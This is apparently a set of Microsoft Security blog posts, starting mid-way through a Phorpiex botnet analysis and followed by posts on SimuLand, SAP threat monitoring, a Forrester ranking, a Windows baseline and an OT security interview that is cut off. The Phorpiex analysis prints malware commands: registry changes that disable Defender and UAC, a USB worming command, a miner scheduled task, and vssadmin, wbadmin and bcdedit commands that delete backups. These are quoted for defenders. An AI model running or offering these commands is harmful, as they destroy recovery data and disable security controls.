The loader modules and updates are pulled from a variety of attacker-owned domains. These domain-names typically begin with a second-level domain (2LD) of TLDR, TSRV, or THAUS and end with an assortment of unorthodox TLD such as .WS, .TOP, .RU, .CO, .TO, .SU., .CC, and .IO. As has been pointed out by other researchers, the TSRV and TLDR are likely references to “Trik Server” or “Trik Loader”, as many of the internals of the malware use Trik as proprietary name.

Regular connections to these attacker-owned domains continue during infection, such that devices that have been infected for months receive new loader versions and capabilities. Modules downloaded from C2 can include additional malware, ransomware, cryptocurrency mining functionality, worming functionality, and the Phorpiex mailing botnet functionality. It is most common for a bot to be participating in mailing and crypto mining, as these seem to be driving revenue generation for the operators during non-ransomware initiatives.

The bot also establishes persistence and attempts to disable security controls. This includes modifying registry keys to disable firewall and antivirus popups or functionality, overriding proxy and browser settings, setting the loader and executables to run at startup, and adding these executables to the authorized application lists. A sample of the keys changed is below, with minor changes from version to version of the loader:

  • \FirewallPolicy\StandardProfile\AuthorizedApplications\List
  • \Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Services
  • \Microsoft\Security Center\AntiVirusOverride
  • \Microsoft\Security Center\AntiVirusDisableNotify
  • \Microsoft\Security Center\FirewallOverride
  • \Microsoft\Security Center\FirewallDisableNotify
  • \Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
  • \Microsoft\Security Center\UpdatesOverride
  • \Microsoft\Security Center\UpdatesDisableNotify
  • \Microsoft\Windows NT\CurrentVersion\SystemRestore
  • \Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
  • \Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
  • \Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable

Enabling tamper protection in Microsoft Defender for Endpoint prevents the bot from making modifications related to Microsoft Defender services. Microsoft Defender for Endpoint automatically cleans up changes made by the bot (if any) during threat cleanup and remediation. Security operations teams can use advanced hunting capabilities to locate these and similar modifications. Administrators can also disable “Local Policy Merge” to prevent local firewall policies from getting in effect over group policies.

As the bot loader updates, the key values change to reflect new files, randomized file paths, and masqueraded system files. The example below illustrates a change from SVCHOST to LSASS:

KEY NAME: HKEY_CURRENT_USER\[ID]\Software\Microsoft\Windows\CurrentVersion\Run
OLD VALUE: C:\1446621146296\svchost.exe
NEW VALUE: C:\19197205241657\lsass.exe

At varying intervals, the bot implant collects lists of files and exfiltrates that data to external IP addresses leased by the attacker, many of which also serve as C2. When additional malware is installed, the pull is initiated from the implant itself. The malware is staged on the Phorpiex operators’ servers prior to new campaigns or on the shared sites such as worm[.]ws.

The bot checks in routinely, often weekly and sometimes even daily. It does this to upload any outcomes from the various modules that the bot installs, such as coin mining deposits or spam activity.

In addition to detecting and blocking the bot malware through its endpoint protection platform (EPP) and endpoint detection and response (EDR) capabilities, Microsoft Defender for Endpoint’s network protection defends against botnet activities like connecting to attacker-controlled servers, mimicking system files, and downloading implants and additional payloads.

Self-spreading via remote drives

One of the more unique and easily identifiable Phorpiex behavior when it spread primarily via USB involves a check that occurs routinely for all connected remote drives. The bot then creates a series of hidden folders on those drives with underscores (e.g., “__”) and then changes the registry attributes to make these appear invisible to the user. The bot then copies all its file configurations and include a malicious DriveMgr.exeI, a copy of the loader, as well as  a .lnk file that runs the malware when opened. This activity has been largely consistent since 2019. This functionality offers a self-spreading mechanism that offers a backup way to expand the bot implant base. Commands consistent with this Phorpiex worming activity are:

  • ShEllExECutE=__\\DriveMgr.exe
  • “cmd.exe” /c start __ & __\DriveMgr.exe & exit

Microsoft Defender for Endpoint offers multiple layers of protection against USB threats. This includes real-time scanning of removable drives and attack surface reduction rule to block untrusted and unsigned processes that run from USB. Microsoft Defender for Endpoint also enables organizations to monitor and control removable drives, for example allow or block USB based on granular configurations, and monitor USB activities.

Phorpiex as a mailing botnet

For several years, Phorpiex used infected machines to deliver extortion, malware, phishing, and other content through large-scale email campaigns. These emails span a large set of lures, subject lines, languages, and recipients, but there are key sets of characteristics that can identify emails sent from the Phorpiex botnet:

  • Spoofed sender domain, sender username, and sender display name
  • Sender domain of 4 random digits
  • Sender username using a generic name with a variety of numbers
  • Subjects or lures referencing singular names, heights and weights, surveillance
  • Body of the message often referencing dating services or extortion material for ransom
  • Presence of Bitcoin, DASH, Etherium, or other cryptocurrency wallets
  • ZIP files or other file types purporting to be images such as JPG files or photo types

These patterns include language more commonly used in consumer extortion emails, which reference having illicit photos or videos of the recipient. These are also the same lures that are used to distribute the bot installer as well as ransomware or other malware. The messages often include old passwords of individuals gathered from publicly available lists, a method that attackers use to add credibility whether the mail is received in a corporate environment or at home.

Microsoft Defender for Office 365 detects malicious emails sent by the Phorpiex botnet. These include the extortion and phishing emails, as well as messages carrying malware, whether the Phorpiex loader itself or other malware. Microsoft Defender for Office 365 users AI and machine learning to detect user and domain impersonation, informed by its comprehensive visibility into email threats as well as through in-depth research like this.

Spam and extortion campaigns

Phorpiex is well known for illicit image or video-based extortion phish and spam campaigns, also known as “sextortion”. These campaigns target a large variety of regions and languages, which is a different set of targets from bot distribution activities. These generally do not deliver malware directly. They are meant to collect revenue for the operator by asserting that they have already compromised a device and have access to damaging material regarding the recipient.

Sextortion campaigns have been quite popular in recent years and generally require payment from the victim in cryptocurrency. We observed Phorpiex operators requiring payment primarily through Bitcoin and Dash. Examples of one such cryptocurrency profit volume from a campaign in late February 2021 targeting English speaking users is below, with the subject “Payment from your account”.

There are several public monitors of extortion wallets operated by Phorpiex, which have seen the operators of the botnet running numerous wallets during any given week. We observed the below example in which an operator requested $950 from users and accumulated over $13,000 in 10 days.

Line graph showing daily amount of cryptocurrency in a particular cryptocurrency address

Figure 3. Cryptocurrency profit volume from a single wallet used in spam extortion campaign in late February 2021. Data from BitInfoCharts.

In late 2020 and early 2021 we also observed this extortion scheme exploiting fears about security vulnerabilities in teleconferencing applications such as Zoom. The messages claimed that a vulnerability is what allowed the operators to capture their extortion material.

Screenshot of sample email used in campaign

Figure 4. Example of an extortion email lure from late 2020

Screenshot of sample email used in campaign

Figure 5. Example of a Korean language extortion email lure from early 2021

In addition to the examples above, Phorpiex is often distributed via business email compromise and contain no links or URLs. This hampers many automatic detection capabilities an organization might have in place.

Phishing, malware, and ransomware campaigns

Phorpiex-powered phishing campaigns as well as bot implant installations deliver secondary malware as well as standard extortion and spam. The tactics involving the spread of emails are the same, with the only differences being in the attachments or links. Malware involving malicious Office documents is interspersed with deliveries of the bot implant or direct ransomware deliveries, which are often contained within .ZIP attachments.

Since 2019, many of the malware-carrying emails from Phorpiex use the same lures, subject lines, and attachment file names. The emails use a randomly generated feminine name in the subject or reference an embarrassing or improperly obtained photo, and either contain extortion or deliver ransomware. As part of the social engineering lure, he malware attachments masquerade as .jpg files or other file types, while appearing as .zip or .js files.

Screenshot of sample email campaign

Figure 6. Example of an email lure including malicious ZIP attachment masquerading as an image of an actress

In Summer and Fall 2020 many new Phorpiex infections began to spread using archive files to deliver BitRansomware and Avaddon. Avaddon only began spreading in mid to late 2020 and its distribution seems to have been tightly coupled with Phorpiex since its inception.

In the month of August 2020, there was also an increase in the number of bot implants installed on devices, corresponding with the ransomware increase. At this time, most instances of ransomware perpetrated by Phorpiex were carried through the bot implant itself.

Phorpiex as malware delivery botnet

In addition to operating as a mailing botnet, Phorpiex has evolved to deliver other malware as well, most notably cryptocurrency mining malware and ransomware.

Cryptocurrency mining malware

In 2019 Phorpiex started utilizing an XMRIG miner to monetize the hosts with Monero. This module is included in almost all bot installations at the time of infection and communicates primarily over port 5555. This behavior might be coupled with other malware, but in this instance, it is associated with the masqueraded system process used by the rest of the Phorpiex implant (i.e., SVCHOST.exe or LSASS.exe).

The miner is downloaded as a module masquerading as WINSYSDRV.exe It stores its configuration locally and checks it periodically. The miner does this from additional masqueraded system processes injected into legitimate processes to read its configuration and to mine.

The WINSYSDRV.exe file routinely kicks off a series of heavily nested processes preceded by a PING with a long wait, which is intended to avoid sandboxes. This command is shown below:

cmd.exe /C ping [INTERNAL IP] -n 8 -w 3000 > Nul & Del /f /q “C:\ProgramData\PnQssBdbSh\winsysdrv.exe” & “C:\Users\[USER]\AppData\Local\Temp\winsysdrv.exe”

In prior versions, this command utilized the legitimate but hijacked WUAPP.exe process. Recently we have seen NOTEPAD.exe used to read the path, which is a variant of C:\ProgramData\[RandomString]cfg:

  • “C:\Windows\System32\wuapp.exe” -c “C:\ProgramData\ADwXcSSGvY\cfgi” (2019-2020)
  • “C:\Windows\System32\wuapp.exe” -c “C:\ProgramData\PnQssBdbSh\cfgi” (2020)
  • “notepad.exe” -c “C:\ProgramData\PnQssBdbSh\cfgi” (2020-2021)
  • “notepad.exe” -c “C:\ProgramData\PnQssBdbSh\cfg” (2020-2021)

In addition to mining Monero, versions of the bot loader also upload to Bitcoin wallets. We were able to scrape those addresses via downstream executables dropped by the Phorpiex loader masquerading as SVCHOST.exe or LSASS.exe. Below is an example of the balance in one such wallet address that was active from September to November 2020, embedded in a specific sample.

Line graph showing daily amount of cryptocurrency in a particular cryptocurrency address

Figure 7. Cryptocurrency profit from a single wallet used in a miner dropped on an infected machine from September to November 2020. Data from BitInfoCharts.

In February of 2021, infected implants also downloaded additional Etherium miners. These miners create scheduled tasks are labeled “WindowsUpdate” but run the miner every minute. The miners search for graphics cards as well as other resources to use for mining with an mining pool. Here’s an example task creation:

schtasks /create /sc minute /mo 1 /tn WindowsUpdate /tr %TEMP%\System.exe

Microsoft has also observed Phorpiex variants with cryptocurrency-clipping functionality accompanying the installation of the loader. In these instances, the malware checks clipboard values for a valid cryptocurrency wallet ID. If it finds one, it sets its own hardcoded value. This method allows attackers to profit from existing mining installations or prior malware without having to bring in new software or remove old instances.

Microsoft Defender for Endpoint detects and blocks cryptocurrency mining malware and coin mining activity in general. To continue enhancing this detection capability, Microsoft recently integrated Intel Threat Detection Technology (TDT) into Microsoft Defender for Endpoint, allowing our endpoint detection and response capabilities to use silicon-based threat detection to better protect against coin mining malware.


Phorpiex has been associated with multiple ransomware families through the years. Phorpiex either delivers ransomware on behalf of other groups using those operators’ infrastructure or host the ransomware themselves. The latter is more common in the case of commodity kits like Avaddon and Knot that the Phorpiex operators may develop themselves.

As recently as February 2021, Avaddon was under active development. Like the Phorpiex loader itself, Avaddon performs language and regional checks for Russia or Ukraine before running to ensure only favored regions are targeted.

The initial Avaddon executable is located in the TEMP folder, and it generally uses a series of random characters as file extension for encrypted files. Before deleting backups and encrypting the drive, it validates that UAC is disabled by checking if certain registry keys are set to “0”, modifying the value if not:

  • \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = “0”
  • \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = “0”
  • \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = “1”

After achieving the privilege level needed, encryption usually occurs on the individual machine without lateral movement, though that is subject to change based on the operator’s monetization strategy. The procedure for deleting backups, like most ransomware, is performed with the following commands:

  • cmd /c wmic.exe SHADOWCOPY /nointeractive
  • cmd /c wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
  • cmd /c bcdedit.exe /set {default} recoveryenabled No
  • cmd /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  • cmd /c vssadmin.exe Delete Shadows /All /Quiet

Microsoft Defender for Endpoint detects and blocks the ransomware. It also detects and raises the following alerts for the encryption and backup deletion behaviors, enabling security operations teams to be notified and immediately respond to ransomware activity on their environment:

  • Ransomware behavior detected in the file system
  • File backups were deleted

We have observed that the external commands and behaviors of the Avaddon ransomware have largely remained the same since its introduction in June-July 2020. This includes the tendency to masquerade as the system file Taskhost.exe. Avaddon, which demands a ransom in Bitcoin equivalent to $700, is still active today and being actively distributed by Phorpiex using new bot loaders that are not substantially different in behavior. Microsoft Defender for Endpoint continues to provide durable protection against these new campaigns.

Other ransomware is slightly less common lately, but in December 2020, a non-weaponized version of Knot ransomware was staged on Phorpiex-operated servers. It did not seem to have had any infections yet as this may have been a test version. This ransomware shares a high degree of similarity to the Phorpiex loader itself and improved versions have not yet been seen. Like Avaddon, Knot typically demands relatively smaller sums of money in Bitcoin, equivalent to $350. The ransom notes generally require Bitcoin payment to a wallet, though no payments seem to have been made that month.

Line graph showing daily amount of cryptocurrency in a particular cryptocurrency address

Figure 8. Cryptocurrency profit volume from a single wallet attached to a Knot ransomware sample in early 2021, showing no payments of the asking price. Data from BitInfoCharts.

Defending against botnets and associated activity

Botnets drive a huge portion of the malware economy, and as the resilience of Phorpiex shows, they evolve to adapt to the ever-changing threat environment. Our many years of experience analyzing, monitoring, and even working with law enforcement and other partners to take down botnets tell us that alternative infrastructures rise as attackers try to fill in the void left by disrupted botnets. Typically, new infrastructures are born as a result of these movements, but in the case of Phorpiex, an established botnet adapts and takes over.

The wide range of malicious activities associated with botnets, as we detailed in this in-depth research into Phorpiex, represent the spectrum of threats that organizations face today: various attack vectors,  multiple spreading mechanisms, and a diverse set of payloads that attackers can change at will. To combat these threats, organizations need security solutions that deliver cross-domain visibility and coordinated defense.

Microsoft 365 Defender leverages the capabilities and signals from the Microsoft 365 security portfolio to correlate threat data from endpoints, email and data, identities, and cloud apps to provide comprehensive protection against threats. Microsoft Defender for Endpoint detects and blocks malware, other malicious artifacts, and malicious behavior associated with botnet activity, as well as the deployment of secondary payloads like cryptocurrency miners and ransomware. Features like attack surface reduction, tamper protection, and security controls for removable media further help prevent these attacks and harden networks against threats in general. Microsoft Defender for Office 365 detects the malicious attachments and URLs in emails generated by the mailing operations of the Phorpiex botnet.

Our industry-leading visibility informs AI and machine learning technologies that power the automatic prevention, detection, and remediation of threats, as well as the rich set of investigation tools available to defenders for hunting, analyzing, and resolving attacks. The recently generally available unified Microsoft 365 Defender security center integrates capabilities so defenders can manage all endpoint, email, and cross-product investigations, configuration, and remediation with a single portal.

Our understanding of how botnets operate and evolve, through in-depth research like this, further enriches our ability to continue delivering defenses against the threats of today and the future. Learn how Microsoft 365 Defender stops attacks with automated, cross-domain security and built-in AI.


Microsoft 365 Defender Threat Intelligence Team


The post Phorpiex morphs: How a longstanding botnet persists and thrives in the current threat environment appeared first on Microsoft Security.

SimuLand: Understand adversary tradecraft and improve detection strategies

May 20th, 2021 No comments

At Microsoft, we continuously collaborate with customers and the InfoSec community to learn more about the latest adversary tradecraft so that we can improve our detection strategies across all our security services. Even though those detections are already built into our products, and protecting customers today, we believe it is important for security researchers to go beyond alerts and detections to understand the underlying attack behaviors and technical implementation of adversary techniques. This also empowers others in the InfoSec community to better respond to investigations of related attacks. To help the broader security community with these efforts, we are releasing SimuLand.

What is SimuLand?

SimuLand is an open-source initiative by Microsoft to help security researchers around the world deploy lab environments that reproduce well-known techniques used in real attack scenarios, actively test and verify the effectiveness of related Microsoft 365 Defender, Azure Defender, and Azure Sentinel detections, and extend threat research using telemetry and forensic artifacts generated after each simulation exercise.

These lab environments will provide use cases from a variety of data sources including telemetry from  Microsoft 365 Defender security products, Azure Defender, and other integrated data sources through Azure Sentinel data connectors.

The purpose behind SimuLand

As we build out the SimuLand framework and start populating lab environments, we will be working under the following basic principles:

  • Understand the underlying behavior and functionality of adversary tradecraft.
  • Identify mitigations and attacker paths by documenting preconditions for each attacker action.
  • Expedite the design and deployment of threat research lab environments.
  • Stay up to date with the latest techniques and tools used by real threat actors.
  • Identify, document, and share relevant data sources to model and detect adversary actions.
  • Validate and tune detection capabilities.

Process integration

Our goal is to have SimuLand integrated with threat research methodologies where dynamic analysis is applied to end-to-end simulation scenarios. The image below shows where SimuLand would fit.

Map of threat research methodologies.

Figure 1: Map of threat research methodologies.

The structure

The structure of the project is very simple and broken down in a modular way so that we can re-use and test a few combinations of attacker actions with different lab environment designs. In addition, step-by-step lab guides are provided to aggregate all the required documentation to not only execute the end-to-end simulation exercise but also prepare and deploy the lab environment. This initiative stems from various open-source projects such as Azure Sentinel2Go and Blacksmith from the Open Threat Research (OTR) community.

How to prepare

Almost every environment contributed through this initiative requires at least a Microsoft 365 E5 license (paid or trial) and an Azure tenant. Other deployment requirements are specified in the lab guides.

The deployment process

Depending on the lab guide being worked on, the design of the network environments might change a little. While some labs will replicate a hybrid cross-domain environment (on-premises to cloud), others will focus only on resources in the cloud. Additionally, Azure Resource Manager (ARM) templates are provided to expedite the deployment process and document the infrastructure as code. The image below represents the first environment released today.

Figure 2: Network environment.

Simulate and detect

Every simulation plan provided through this project is research-based and broken down into attacker actions mapped to the MITRE ATT&CK framework. The goal of the simulate and detect component is to also summarize the main steps used by a threat actor to accomplish a specific object and allow security researchers to get familiarized with the attacker behavior at a high level. For example, the image below shows some of the ways one could export the token signing certificate from a federation server.

Figure 3: Example of exporting token signing certificate from federation server.

Organize security alerts

Finally, from a defensive perspective, simulation steps will be mapped to detection queries and alerts from Microsoft 365 Defender security products, Azure Defender, and Azure Sentinel. You can use similar views like the one below from the Microsoft 365 security portal to organize security alerts. We believe this will help guide some of the extended threat research generated from the simulation exercise.

Figure 4: Microsoft 365 Defender security portal.

You can also use the Azure Sentinel investigation experience to aggregate alerts from Microsoft 365 defender and Azure Sentinel to provide additional context.

Figure 5: Azure Sentinel investigation view.

Future work

Besides creating more scenarios, we are also going to be working on several features to improve the project. The list below shows some of the ideas we currently have:

  • A data model to document the simulation steps in a more organized and standardized way.
  • A CI/CD pipeline with Azure DevOps to deploy and maintain infrastructure.
  • Automation of attack actions in the cloud via Azure Functions.
  • Capabilities to export and share telemetry generated with the InfoSec community.
  • Microsoft Defender evaluation labs integration.

Community contributions

We look forward to contributions and feedback from the community. If you would like to contribute to specific areas of the project, open an issue in our GitHub repository and share your ideas. Take a look at the “Future Work” section for some ideas.

New end-to-end simulation scenarios

If you would like to share a new end-to-end attacker path, let us know by opening an issue in our GitHub repository, and we would be happy to collaborate and provide some resources to make it happen. We would then share the output with the community through this project after the appropriate validation and detection development process. Remember that simulation scenarios are not only based on well-known attack paths, but also the creativity of the researcher.

Additional detection queries

If you build detection rules that can be added to our simulate and detect section, feel free to open an issue and we will help you to contribute to the official Microsoft 365 Defender and Azure Sentinel detection repositories. We use queries directly from those two resources in our documents.

Learn more

To learn more about this open-source initiative, visit the SimuLand GitHub repository.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post SimuLand: Understand adversary tradecraft and improve detection strategies appeared first on Microsoft Security.

Protecting SAP applications with the new Azure Sentinel SAP threat monitoring solution

May 19th, 2021 No comments

As one of the leading solution providers for applications that manage business processes, SAP is the custodian for massive amounts of sensitive data in many of the biggest organizations in the world.

Since these applications are business-critical, an SAP security breach can be catastrophic. Yet, protecting SAP applications is uniquely challenging. These systems are growing in complexity as organizations expand them beyond base capabilities. They are vulnerable not only to outside attacks, but also insider threats. What’s more, their complex nature means that threats can emerge across multiple modules, making cross-correlation especially important.

It has been traditionally very difficult for security operations (SecOps) teams to effectively monitor them due to the unique nature of the SAP ecosystems and the expertise they require. We set out to meet this challenge with the new SAP threat monitoring solution for Azure Sentinel. Now in public preview, the solution provides continuous threat detection and analytics for SAP systems deployed on Azure, in other clouds, or on-premises. Now, SecOps teams can use Azure Sentinel’s visibility, threat detection, and investigation tools to protect their SAP systems and cross-correlate across their entire organization.

Effective SAP threat monitoring

An effective approach to SAP threat monitoring has several key requirements:

  1. Multi-layered coverage: An SAP threat monitoring solution needs to cover both the infrastructure layer (virtual machine, storage, and network) as well as the business and applicative layers since threats traverse every layer of the SAP system.
  2. Rich insight into SAP applicative and transactional data: SAP systems produce viable security data in the form of change documents, audit logging, job execution, data transformation (table data), and more. For a complete picture of potential threats, you need visibility into all this activity.
  3. Correlation across enterprise data sources: SAP systems are complex, and indicators of compromise often aren’t straightforward. To reduce noise, it’s imperative to cross-correlate across additional data sources such as network, storage, or identity data, as well as across other entities, such as systems and users.
  4. Flexible deployment: SAP NetWeaver systems can be deployed on-premises, in the cloud, or hybrid deployments. Any effective SAP monitoring solution needs to offer deployment flexibility and provide visibility into any of these deployment configurations—especially since cloud transformation is often a long, multi-stage process, and organizations may find their SAP deployment method changing over time.
  5. Threat detections specific to SAP: SAP systems are unique environments facing unique threats. An effective monitoring approach needs to include threat detections and analytics tailored to SAP-specific use cases and threats.
  6. Customizability: On the flip side, SAP ABAP platforms inclusive of S/4HANA are also highly custom in nature, which means that you can’t rely solely on out-of-the-box detections. The SAP threat monitoring approach needs to be open to modification and include the ability to build or import your own security content, so you can tailor detection to your specific environment.

Our approach: The SAP threat monitoring solution for Azure Sentinel

We kept these requirements top of mind when developing our approach to SAP threat monitoring. The Azure Sentinel SAP threat monitoring solution can be deployed in one simple package that includes all components. The solution includes:

  • A Rich NetWeaver data connector: The SAP collector is delivered as a Docker container image that can be deployed anywhere in the network and integrate into NetWeaver capable systems. The data connector collects over 10 different log files with SAP NetWeaver enabled systems that allows monitoring business and application layer-related risks within SAP systems. You can view the full list of available log sources in the documentation.
  • SAP underlying Infrastructure data connectors: Existing Azure Sentinel data connectors, such as those for virtual machines, networking, and Azure Active Directory, monitor the underlying infrastructure.
  • Built-in security content: Out-of-the-box detections catch important SAP threats like system configuration changes, execution of sensitive function modules, and suspicious activity by privileged users. Plus, a workbook helps SecOps teams visualize the security health of their SAP systems.

Out-of-the-box detections included in the Azure Sentinel SAP threat monitoring solution.

Figure 1: Out-of-the-box detections included in the Azure Sentinel SAP threat monitoring solution.

An SAP workbook in Azure Sentinel.

Figure 2: SAP workbook helps analyze different security audit log events by severity, in order to keep track of the different events on the SAP ABAP system.

Visualizing and tracking authentication events using a built-in workbook.

Figure 3: Visualizing and tracking authentication events using a built-in workbook.

  • A rich set of configurations is also included in the form of watchlists. These watchlists reduce noise by allowing you to describe your specific SAP environment and the risks you’re most concerned about. For example, specify whether a certain system is a production or test system, and identify any specific SAP transactions that should be especially carefully monitored.

Use case: Monitoring for abuse of privileges with Azure Sentinel

What does this look like in action? One of the most common SAP security risks is the potential misuse of privileges. With the right privileges, SAP users can execute functions and even debug ABAP code running on these systems, which—while necessary—also by nature opens the system up to significant risk. For example, an SAP user with developer privileges could exploit those privileges to view sensitive human resources or financial data by executing a function module to gain elevated access privileges.

Azure Sentinel gives you the ability to quickly detect these threats without drowning in noise. You can monitor function modules executed via SE37, while also targeting your detections by defining a granular set of your most sensitive modules. You can also specify that these detections should only apply to your production systems since these behaviors can be common and harmless in developer or sandbox systems.

The pre-configured functions and detections can monitor for these threats from day one, while still providing the flexibility you need to customize your implementation.

Another common scenario is the use of break-glass users such as DDIC/SAP. While those users are frequently enabled for valid reasons, the usage of these privileges still needs to be very carefully monitored due to the high privileges of the default “superman” users. In Azure Sentinel, you can monitor for these users and use automation to help you manage these risks. For example, monitor for system access from these users, and when it is detected, automatically call a playbook that will send a Teams message to confirm that SAP basis permissions were given to perform the operation.

Learn more

Azure Sentinel threat monitoring for SAP capabilities enables you to protect critical SAP systems more efficiently and effectively and extends Azure Sentinel’s cloud-native security analytics and AI capabilities to the world of SAP. Learn more about the SAP threat monitoring solution in documentation, or join us live on May 26, 2021, at 8 AM Pacific Time to learn more about the SAP threat monitoring solution live in our Azure Sentinel webinar.

In addition to threat monitoring for SAP, we announced several new Azure Sentinel innovations at the RSA Conference 2021. Learn more about these announcements, including new integrations, ML features, collaboration capabilities, and more, on the Azure Sentinel announcement blog.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Protecting SAP applications with the new Azure Sentinel SAP threat monitoring solution appeared first on Microsoft Security.

Forrester names Microsoft a Leader in The Forrester Wave™: Cloud Security Gateways, Q2 2021

May 19th, 2021 No comments

I am thrilled to share that Forrester Research has named Microsoft Cloud App Security as a Leader in The Forrester Wave™: Cloud Security Gateways, Q2 2021. Additionally, Microsoft received the highest score in the strategy category.

People have increasingly used cloud apps to stay productive and connected during this challenging period. Organizations have accelerated the migration to the cloud to address their evolving needs. While the adoption of cloud apps offers a simple and cost-effective solution, it can also lead to a rise in shadow IT and creates an urgency to address new security and compliance requirements.

Our continued innovation in Microsoft Cloud App Security is focused on helping you gain visibility of your cloud apps, discover shadow IT, protect sensitive information anywhere in the cloud, enable protection against cyber threats, assess compliance, and manage security posture across clouds. We are honored to be recognized as a leader in this Forrester Wave for Cloud Security Gateways based on the strength of our security solution and strategy.

Microsoft placement in the Forrester Wave: Cloud Security Gateways, Q2 2021. Microsoft located in top right hand corner and identified as a Leader.

Microsoft cloud security solutions and strategies

Visibility and control across multi-cloud and software as a service (SaaS) environments: Most organizations have multi-cloud environments and use SaaS apps across different platforms. It is critical to gain visibility and enable protection across these environments. We are honored to be recognized in the Forrester report for the investments in securing multi-cloud environments including security policy management and recommendations for AWS and Google Cloud. You can see how Accenture is using Cloud App Security to safeguard its resources across Microsoft Azure, Microsoft 365,, ServiceNOW, and other SaaS apps.

Comprehensive threat and information protection: Cloud App Security will help secure your sensitive information anywhere in the cloud and protect against cyber threats and anomalies. This Wave recognizes our investments in real-time malware and threat protection and gives the top rating possible in the criteria of capabilities like user threat protection and data loss prevention (DLP) reporting and integration. Learn how St. Luke’s University Health Network is using Cloud App Security to protect their data in the cloud and enable secure health communications to improve care.

Strong policy enforcement: Providing easy deployment, low implementation requirements, and helping enforce compliance standards quickly are key design principles for Cloud App Security. Forrester gave us the top scores possible in the administration management, sanctioned and unsanctioned apps management, DLP policy management, infrastructure as a service (IaaS) policy and runtime activity monitoring, and posture management criteria.

As security teams are tasked to do more with less in these challenging times, and as users are trying to remain productive while being secure, our team is here to help. To all our customers, thank you for joining us in this journey to safeguard cloud apps.

Watch this video to learn more about Microsoft Cloud App Security. You can also start a free trial today.

Learn more

Read this complimentary copy of The Forrester Wave™: Cloud Security Gateways, Q2 2021 for the analysis behind Microsoft’s position as a Leader.

Learn how 75 percent of threats can be eliminated due to increased visibility and automated threat protection with Cloud App Security in this Forrester Consulting Total Economic Impact™ study commissioned by Microsoft.

For more information about our cloud access security broker (CASB) solution, visit our Microsoft Cloud App Security page.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The Forrester Wave™ is copyrighted by Forrester Research, Inc. Forrester and Forrester Wave™ are trademarks of Forrester Research, Inc. The Forrester Wave™ is a graphical representation of Forrester’s call on a market and is plotted using a detailed spreadsheet with exposed scores, weightings, and comments. Forrester does not endorse any vendor, product, or service depicted in the Forrester Wave™. Information is based on best available resources. Opinions reflect judgment at the time and are subject to change.

The post Forrester names Microsoft a Leader in The Forrester Wave™: Cloud Security Gateways, Q2 2021 appeared first on Microsoft Security.

Categories: cybersecurity Tags:

Security baseline (FINAL) for Windows 10, version 21H1

May 18th, 2021 No comments

We are pleased to announce the final release of the Windows 10, version 21H1 (a.k.a. May 2021 Update) security baseline package!

Please download the content from the Microsoft Security Compliance Toolkit, test the recommended configurations, and customize / implement as appropriate.


This Windows 10 feature update brings very few new policy settings. At this point, no new 21H1 policy settings meet the criteria for inclusion in the security baseline. We are, however, refreshing the package to ensure the latest content is available to you. The refresh contains an updated administrative template for SecGuide.admx/l (that we released with Microsoft 365 Apps for Enterprise baseline), new spreadsheets, .PolicyRules file, along with a script change (commented out the Windows Server options in the Baseline-LocalInstall.ps1 script)


Windows 10, version 21H1 is a client only release. Windows Server, version 20H2 is the current Windows Server Semi-Annual Channel release and per our lifecycle policy is supported until May 10, 2022.


As a reminder, our security baselines for the endpoint also include Microsoft 365 Apps for Enterprise, which we recently released, as well as Microsoft Edge and Windows Update.


Please let us know your thoughts by commenting on this post or via the Security Baseline Community.

Categories: Uncategorized Tags:

Mitigate OT security threats with these best practices

May 18th, 2021 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest Voice of the Community blog series post, Microsoft Product Marketing Manager Natalia Godyla talks with Chris Sistrunk, Technical Manager in Mandiant’s ICS/OT Consulting practice and former engineer at Entergy, where he was a subject matter expert on transmission and distribution of supervisory control and data acquisition (SCADA) systems. In this blog, Chris shares best practices to help mitigate the security threats to operational technology (OT) environments.

Natalia: What tools do you use to monitor and govern your OT environment?

Chris: First, you can use the control system itself, which already offers some level of visibility into what’s happening. It looks like NASA control. Operators sit and watch the process all day. You can see what looks normal and what doesn’t look normal.

What’s new is not just looking at the system itself but at OT network security. Especially in the last five or six years, the focus has been on getting network visibility sensors into the control network. There are several vendors, like MODBUS, Siemens S7, and DNP3, out there that understand the protocols and have developed sensors that are purpose-built to analyze OT network traffic rather than IT traffic.

With a newer control system, it’s much easier. Many times, they’ll use virtual machines to manage OT, so you can put agents in those areas. If it’s a Windows 10 or Windows 7 environment, you can even use Microsoft Defender Antivirus and collect the Windows event logs and switch logs. If you don’t look at the logs, you’re not going to know what’s there, so you need to monitor behavior at the network layer using technologies like deep packet inspection (DPI) to identify compromised devices.

Natalia: What are some best practices for securing remote access to the OT network?

Chris: Number one, if you don’t need it at all, don’t have it. That’s the most secure option.

Number two, if you have to have it, make sure it’s engineered for why it’s needed and tightly control who can use it. It’s also important to make sure it’s monitored and protected with multifactor authentication (MFA) unless it’s just for read-only access to the control network, in which case it’s less of a risk. A lot of times, these OT equipment vendors require in their warranty contracts that they have remote access with full control and the ability to change configurations, which means you’ve given someone a high level of privileged access to your control systems.

Number three, have a process and procedure for when that remote access is used and when it’s turned off. You should at least know who was there and for how long, and who did what, using audit logs, for example.

I want to highlight that the Water ISAC, the international security network created for the water and wastewater sector, published a free document called 15 Cybersecurity Fundamentals for Water and Wastewater Utilities. It’s a reminder to consider where remote access is coming from.

Natalia: What percentage of organizations are continuously monitoring their OT networks?

